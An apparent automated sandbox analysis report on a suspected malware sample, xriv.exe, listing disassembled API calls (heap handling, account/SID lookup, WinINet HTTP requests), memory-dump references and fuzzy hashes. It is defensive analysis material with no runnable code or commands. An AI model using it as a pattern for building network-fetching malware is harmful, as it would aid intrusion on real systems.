                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 010A3199
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 010A319C
                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 010A31C6
                                                                        • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 010A31D9
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 010A32D5
                                                                        • HeapFree.KERNEL32(00000000), ref: 010A32DE
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A32E3
                                                                        • HeapFree.KERNEL32(00000000), ref: 010A32E6
                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A32ED
                                                                        • HeapFree.KERNEL32(00000000), ref: 010A32F0
                                                                        • LocalFree.KERNEL32(00000000), ref: 010A32F5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                        • String ID:
                                                                        • API String ID: 3326663573-0
                                                                        • Opcode ID: 94da20ee3aa86c5665a941fa06a254620e47dfdbee8bb473c563d2c0f0a49827
                                                                        • Instruction ID: 44046334ed1b8e9c53e6bb0131cbc2588d801df47d1fafdc220b994661b9d585
                                                                        • Opcode Fuzzy Hash: 94da20ee3aa86c5665a941fa06a254620e47dfdbee8bb473c563d2c0f0a49827
                                                                        • Instruction Fuzzy Hash: FF714E71D00209AFDB159FA8DC84BEFBFB8FB48300F504569E945A7284DB359945CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ___free_lconv_mon.LIBCMT ref: 010C1705
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C12BB
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C12CD
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C12DF
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C12F1
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1303
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1315
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1327
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1339
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C134B
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C135D
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C136F
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1381
                                                                          • Part of subcall function 010C129E: _free.LIBCMT ref: 010C1393
                                                                        • _free.LIBCMT ref: 010C16FA
                                                                          • Part of subcall function 010BD653: HeapFree.KERNEL32(00000000,00000000,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?), ref: 010BD669
                                                                          • Part of subcall function 010BD653: GetLastError.KERNEL32(?,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?,?), ref: 010BD67B
                                                                        • _free.LIBCMT ref: 010C171C
                                                                        • _free.LIBCMT ref: 010C1731
                                                                        • _free.LIBCMT ref: 010C173C
                                                                        • _free.LIBCMT ref: 010C175E
                                                                        • _free.LIBCMT ref: 010C1771
                                                                        • _free.LIBCMT ref: 010C177F
                                                                        • _free.LIBCMT ref: 010C178A
                                                                        • _free.LIBCMT ref: 010C17C2
                                                                        • _free.LIBCMT ref: 010C17C9
                                                                        • _free.LIBCMT ref: 010C17E6
                                                                        • _free.LIBCMT ref: 010C17FE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                        • String ID:
                                                                        • API String ID: 161543041-0
                                                                        • Opcode ID: 71dd119ecb13ddf69cea676f743266f38b54834878ca323689c8a75ce4af2603
                                                                        • Instruction ID: 2f65ed2439391ce83a2e04c7e1ca7fa05ff2573952b451c5961a01eb124bf5a5
                                                                        • Opcode Fuzzy Hash: 71dd119ecb13ddf69cea676f743266f38b54834878ca323689c8a75ce4af2603
                                                                        • Instruction Fuzzy Hash: B8315C31600705DFEB61AB79E884B9AB7E9BF14A18F10899EE1D8D7152DA70E980CF14
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 010B8CC2
                                                                        • type_info::operator==.LIBVCRUNTIME ref: 010B8CE9
                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 010B8DF5
                                                                        • CatchIt.LIBVCRUNTIME ref: 010B8E4A
                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 010B8ED0
                                                                        • _UnwindNestedFrames.LIBCMT ref: 010B8F57
                                                                        • CallUnexpected.LIBVCRUNTIME ref: 010B8F72
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                        • String ID: csm$csm$csm
                                                                        • API String ID: 4234981820-393685449
                                                                        • Opcode ID: e3c7fecafd980d31a0febb94f4c853ae3d491607f77171b49b092197319439c4
                                                                        • Instruction ID: f8a5b5f16195340d4971b04a93fff7332b680110363301d02000ba20b8b5b4d1
                                                                        • Opcode Fuzzy Hash: e3c7fecafd980d31a0febb94f4c853ae3d491607f77171b49b092197319439c4
                                                                        • Instruction Fuzzy Hash: D0C15C7180020ADFDF59EF98C8C09EEBBB9BF14314F04819BE9916B222D731DA51CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 010BDE42
                                                                          • Part of subcall function 010BD653: HeapFree.KERNEL32(00000000,00000000,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?), ref: 010BD669
                                                                          • Part of subcall function 010BD653: GetLastError.KERNEL32(?,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?,?), ref: 010BD67B
                                                                        • _free.LIBCMT ref: 010BDE4E
                                                                        • _free.LIBCMT ref: 010BDE59
                                                                        • _free.LIBCMT ref: 010BDE64
                                                                        • _free.LIBCMT ref: 010BDE6F
                                                                        • _free.LIBCMT ref: 010BDE7A
                                                                        • _free.LIBCMT ref: 010BDE85
                                                                        • _free.LIBCMT ref: 010BDE90
                                                                        • _free.LIBCMT ref: 010BDE9B
                                                                        • _free.LIBCMT ref: 010BDEA9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: aa94af89ef32d175a5a73ec0141279e6c2525f788516f758e375e59ac636e14a
                                                                        • Instruction ID: 2b6abf4b2121002c203f88e274c2635f70e6b8565c08c1336d4a472e607c712c
                                                                        • Opcode Fuzzy Hash: aa94af89ef32d175a5a73ec0141279e6c2525f788516f758e375e59ac636e14a
                                                                        • Instruction Fuzzy Hash: 6C219C7690450DAFCB41EFD4D880DDDBBB9BF28648F018165E5599B120DB71D684CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • InternetOpenW.WININET(010D3F6C,00000000,00000000,00000000,00000000), ref: 010A871C
                                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 010A8740
                                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 010A878A
                                                                        • HttpSendRequestA.WININET(?,00000000), ref: 010A884A
                                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 010A88FC
                                                                        • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 010A89B0
                                                                        • InternetCloseHandle.WININET(?), ref: 010A89D7
                                                                        • InternetCloseHandle.WININET(?), ref: 010A89DF
                                                                        • InternetCloseHandle.WININET(?), ref: 010A89E7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                        • String ID:
                                                                        • API String ID: 1354133546-0
                                                                        • Opcode ID: 868492ba59c7793d1e030ed07829ab754bf91bbde4460aa6bdcdf0a3eafb6351
                                                                        • Instruction ID: 210ed1c7d4c5e81b57ea3f7b63a3cf3bed00bd019d16498ff49671242d433642
                                                                        • Opcode Fuzzy Hash: 868492ba59c7793d1e030ed07829ab754bf91bbde4460aa6bdcdf0a3eafb6351
                                                                        • Instruction Fuzzy Hash: 04C106B06101189FEB28CF28CC88BDDBF75EF85315F848199E68897281DB759AC0CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: acf6430a63d3fbb3145ad9179f3fe3d0df64a679795acc35e45e9398e8252c23
                                                                        • Instruction ID: f3c03ccabb574d2d26dc247b521ebef341ccbe4fc291551fe2a4a5291f98cf48
                                                                        • Opcode Fuzzy Hash: acf6430a63d3fbb3145ad9179f3fe3d0df64a679795acc35e45e9398e8252c23
                                                                        • Instruction Fuzzy Hash: 61C1CD78A042499FDB11CF98DC80BEEBBB1FF4A714F04419DE995AB282C735A941CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$___from_strstr_to_strchr
                                                                        • String ID:
                                                                        • API String ID: 3409252457-0
                                                                        • Opcode ID: 871fe5f850415a31fd3c5a57cc693d419851f6695a91142cc433fcd8d05122a6
                                                                        • Instruction ID: 9c4dbbad688a34408aba5726e9231ead45c7133379895b89a8ce1352730c0ac2
                                                                        • Opcode Fuzzy Hash: 871fe5f850415a31fd3c5a57cc693d419851f6695a91142cc433fcd8d05122a6
                                                                        • Instruction Fuzzy Hash: ED51F37894434BEFEB21AFA8D8C0AAD7BE4AF11B18F00419EF9D497289DB359140CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _ValidateLocalCookies.LIBCMT ref: 010B85A7
                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 010B85AF
                                                                        • _ValidateLocalCookies.LIBCMT ref: 010B8638
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 010B8663
                                                                        • _ValidateLocalCookies.LIBCMT ref: 010B86B8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                        • String ID: csm
                                                                        • API String ID: 1170836740-1018135373
                                                                        • Opcode ID: 0ab897f233c661d8f14d141e268b508a807ce4d9b88e514ec9a419e6e7d494e0
                                                                        • Instruction ID: daf80c7038f4bd031207932be623effa27b7e6da8dc3af4a46825852fd155294
                                                                        • Opcode Fuzzy Hash: 0ab897f233c661d8f14d141e268b508a807ce4d9b88e514ec9a419e6e7d494e0
                                                                        • Instruction Fuzzy Hash: 9B41B274A00209EBCF50DF6CC8C4ADEBFB9AF59214F04C196E9949B3A1D7319A01CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 0-537541572
                                                                        • Opcode ID: bdd9fd90526dcd2774101ffa0212ebd275fb3eaf83c35b24477ffca5bdb3a0c3
                                                                        • Instruction ID: 35e900f5338673b5906e6a4432c77b05345dd97bdc6f1d3c03c2789a1568d87d
                                                                        • Opcode Fuzzy Hash: bdd9fd90526dcd2774101ffa0212ebd275fb3eaf83c35b24477ffca5bdb3a0c3
                                                                        • Instruction Fuzzy Hash: 04210A72A41221AFFB724B6DDCC4ADE3BD89F55760F150264EDC6A7285D635EC00CAE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 010C1405: _free.LIBCMT ref: 010C142A
                                                                        • _free.LIBCMT ref: 010C148B
                                                                          • Part of subcall function 010BD653: HeapFree.KERNEL32(00000000,00000000,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?), ref: 010BD669
                                                                          • Part of subcall function 010BD653: GetLastError.KERNEL32(?,?,010C142F,?,00000000,?,?,?,010C1456,?,00000007,?,?,010C1858,?,?), ref: 010BD67B
                                                                        • _free.LIBCMT ref: 010C1496
                                                                        • _free.LIBCMT ref: 010C14A1
                                                                        • _free.LIBCMT ref: 010C14F5
                                                                        • _free.LIBCMT ref: 010C1500
                                                                        • _free.LIBCMT ref: 010C150B
                                                                        • _free.LIBCMT ref: 010C1516
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                                        • Instruction ID: 4788b3be094ec79bc477dd30b12eaa9a8350789651f3b065728bb47549e6b76c
                                                                        • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                                        • Instruction Fuzzy Hash: 70116D72540B09EAD620BFB1DC45FCFF79C9F28B05F414819A3DDAA051DB38A545CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetConsoleCP.KERNEL32(?,010A5140,00000000), ref: 010C2B40
                                                                        • __fassign.LIBCMT ref: 010C2D1F
                                                                        • __fassign.LIBCMT ref: 010C2D3C
                                                                        • WriteFile.KERNEL32(?,010A5140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010C2D84
                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 010C2DC4
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 010C2E70
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                        • String ID:
                                                                        • API String ID: 4031098158-0
                                                                        • Opcode ID: 4499b86ab54170c0605e4fdd5e3ad3ac225ba7ac24fc7134cfb2e23e87697467
                                                                        • Instruction ID: 7c5c8287511ad623cca32b65765012a8624c1e29e271ccb84b199d01305de2bf
                                                                        • Opcode Fuzzy Hash: 4499b86ab54170c0605e4fdd5e3ad3ac225ba7ac24fc7134cfb2e23e87697467
                                                                        • Instruction Fuzzy Hash: D0D19875D002599FCB15CFE8C8809EDBBB5BF48714F28416EE896BB242D631AA46CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,010B8887,010B8476,010B7AC4), ref: 010B889E
                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 010B88AC
                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 010B88C5
                                                                        • SetLastError.KERNEL32(00000000,010B8887,010B8476,010B7AC4), ref: 010B8917
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastValue___vcrt_
                                                                        • String ID:
                                                                        • API String ID: 3852720340-0
                                                                        • Opcode ID: b8ba0243068bb55081cfa7c7116c792279ef37265edb78b4c0c23bd21a342a3c
                                                                        • Instruction ID: 30a940e45467e15289f081dee7ba4fd615bd79b0b82235dfe74f614bd75a884c
                                                                        • Opcode Fuzzy Hash: b8ba0243068bb55081cfa7c7116c792279ef37265edb78b4c0c23bd21a342a3c
                                                                        • Instruction Fuzzy Hash: 7101D83251A3125FAAB52678BCC49DB2EDCEF016F5720C23BFAE0504E5EF1648004791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 010C0033
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                        • API String ID: 0-2143882575
                                                                        • Opcode ID: 4e1aa808e59393ee98feea1d3e8e4300c8fc38669aa5720366ee727540244940
                                                                        • Instruction ID: 20e3ad2ff49d8466dbe55d9a96216671be0271d82e4568940bba19e274cdc57f
                                                                        • Opcode Fuzzy Hash: 4e1aa808e59393ee98feea1d3e8e4300c8fc38669aa5720366ee727540244940
                                                                        • Instruction Fuzzy Hash: 6E21C279640207EFDB31AFA9CC809EF77ADEF00A64B214518F99596245EB31EC40CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcsrchr
                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                        • API String ID: 1752292252-4019086052
                                                                        • Opcode ID: e29a475ce78faba5f29be30575b7b8ddc8432e166c34de92fcee9b9d9338731e
                                                                        • Instruction ID: c90bd05db43f13e8eea863f2d5dc91e7c845e1b6dc34b3e38d7bc6303c5240a0
                                                                        • Opcode Fuzzy Hash: e29a475ce78faba5f29be30575b7b8ddc8432e166c34de92fcee9b9d9338731e
                                                                        • Instruction Fuzzy Hash: B801C43B604627266754211D9C817EB3BEC9BD2FB0726002EF9C8EB281EE84E8034592
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: api-ms-
                                                                        • API String ID: 0-2084034818
                                                                        • Opcode ID: 98a71ce94f1b311dd4c1b1cbc94668646cca82a901c6a31a0d1f50836de6b0dc
                                                                        • Instruction ID: 1008ba53aeb06dd3fe2dbc05f674236a0a28f3c2fa04de256ba11bd1d9849916
                                                                        • Opcode Fuzzy Hash: 98a71ce94f1b311dd4c1b1cbc94668646cca82a901c6a31a0d1f50836de6b0dc
                                                                        • Instruction Fuzzy Hash: B8119AB2901223AFDBB24B2DDCC4ADE3BA4DF01678B110550EFD5A7285D635E90086D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,010BA9D8,010BE000,?,010BA9A0,010BAF26,?,010BE000), ref: 010BA9F8
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 010BAA0B
                                                                        • FreeLibrary.KERNEL32(00000000,?,?,010BA9D8,010BE000,?,010BA9A0,010BAF26,?,010BE000), ref: 010BAA2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
